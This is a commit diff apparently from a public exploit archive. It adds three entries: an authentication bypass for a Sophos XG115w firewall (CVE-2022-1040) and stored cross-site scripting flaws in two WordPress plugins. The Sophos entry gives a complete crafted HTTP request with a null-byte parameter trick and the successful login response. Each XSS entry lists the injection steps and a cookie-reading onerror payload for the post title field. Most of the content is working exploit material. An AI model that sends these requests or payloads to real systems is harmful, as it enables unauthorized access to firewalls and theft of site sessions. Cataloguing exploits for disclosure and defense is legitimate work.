DB: 2022-09-02

Offensive Security · Offensive Security · commit 2f709ff851ad · 2022-09-02T05:01:57.000Z
3 changes to exploits/shellcodes

Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass
WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS)
WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS)
diff --git a/exploits/hardware/webapps/51006.txt b/exploits/hardware/webapps/51006.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass
+# Date: 2022-08-04
+# Exploit Author: Aryan Chehreghani
+# Vendor Homepage: https://www.sophos.com
+# Version: 17.0.10 MR-10
+# Tested on: Windows 11
+# CVE : CVE-2022-1040
+
+# [ VULNERABILITY DETAILS ] :
+
+#This vulnerability allows an attacker to gain unauthorized access to the firewall management space by bypassing authentication.
+
+# [ SAMPLE REQUEST ] :
+
+POST /webconsole/Controller HTTP/1.1
+Host: 127.0.0.1:4444
+Cookie: JSESSIONID=c893loesu9tnlvkq53hy1jiq103
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
+Accept: text/plain, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Origin: https://127.0.0.1:4444
+Referer: https://127.0.0.1:4444/webconsole/webpages/login.jsp
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 192
+
+mode=151&json={"username"%3a"admin","password"%3a"somethingnotpassword","languageid"%3a"1","browser"%3a"Chrome_101","accessaction"%3a1,+"mode\u0000ef"%3a716}&__RequestType=ajax&t=1653896534066
+
+# [ KEY MODE ] : \u0000eb ,\u0000fc , \u0000 ,\u0000ef ,...
+
+# [ Successful response ] :
+
+HTTP/1.1 200 OK
+Date: Thu, 04 Aug 2022 17:06:39 GMT
+Server: xxxx
+X-Frame-Options: SAMEORIGIN
+Strict-Transport-Security: max-age=31536000
+Expires: Thu, 01 Jan 1970 00:00:00 GMT
+Content-Type: text/plain;charset=utf-8
+Content-Length: 53
+Set-Cookie: JSESSIONID=1jy5ygk6w0mfu1mxbv6n30ptal108;Path=/webconsole;Secure;HttpOnly
+Connection: close
+
+{"redirectionURL":"/webpages/index.jsp","status":200}
diff --git a/exploits/php/webapps/51007.txt b/exploits/php/webapps/51007.txt
@@ -0,0 +1,15 @@
+# Exploit Title: WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS)
+# Date: 05/08/2022
+# Exploit Author: saitamang , yunaranyancat , syad
+# Vendor Homepage: https://wordpress.org
+# Software Link: https://wordpress.org/plugins/testimonial-slider-and-showcase/
+# Version: 2.2.6
+# Tested on: Centos 7 apache2 + MySQL
+
+WordPress Plugin "Testimonial Slider and Showcase" is prone to a cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Testimonial Slider and Showcase" version 2.2.6 is vulnerable; prior versions may also be affected.
+
+Login as Editor > Add testimonial > Under Title inject payload below ; parameter (post_title parameter) > Save Draft > Preview the post
+
+payload --> test"/><img/src=""/onerror=alert(document.cookie)>
+
+The draft post can be viewed using the Editor account or Admin account and XSS will be triggered once clicked.
diff --git a/exploits/php/webapps/51008.txt b/exploits/php/webapps/51008.txt
@@ -0,0 +1,17 @@
+# Exploit Title: WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS)
+# Date: 08/08/2022
+# Exploit Author: saitamang, syad, yunaranyancat
+# Vendor Homepage: wordpress.org
+# Software Link: https://downloads.wordpress.org/plugin/netroics-blog-posts-grid.zip
+# Version: 1.0
+# Tested on: Centos 7 apache2 + MySQL
+
+WordPress Plugin "Netroics Blog Posts Grid" is prone to a stored cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Netroics Blog Posts Grid" version 1.0 is vulnerable; prior versions may also be affected.
+
+Login as Editor > Add testimonial > Under Title inject payload below ; parameter (post_title parameter) > Save Draft > Preview the post
+
+
+payload --> user s1"><img src=x onerror=alert(document.cookie)>.gif
+
+
+The draft post can be viewed using other Editor or Admin account and Stored XSS will be triggered.
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -45067,3 +45067,6 @@ id,file,description,date,author,type,platform,port
 51002,exploits/php/webapps/51002.txt,"Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Shivam Singh",webapps,php,
 51003,exploits/multiple/webapps/51003.txt,"ThingsBoard 3.3.1 'name' - Stored Cross-Site Scripting (XSS)",1970-01-01,"Steffen Langenfeld",webapps,multiple,
 51004,exploits/multiple/webapps/51004.txt,"ThingsBoard 3.3.1 'description' - Stored Cross-Site Scripting (XSS)",1970-01-01,"Steffen Langenfeld",webapps,multiple,
+51006,exploits/hardware/webapps/51006.txt,"Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass",1970-01-01,"Aryan Chehreghani",webapps,hardware,
+51007,exploits/php/webapps/51007.txt,"WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Luqman Hakim Zahari",webapps,php,
+51008,exploits/php/webapps/51008.txt,"WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Luqman Hakim Zahari",webapps,php,
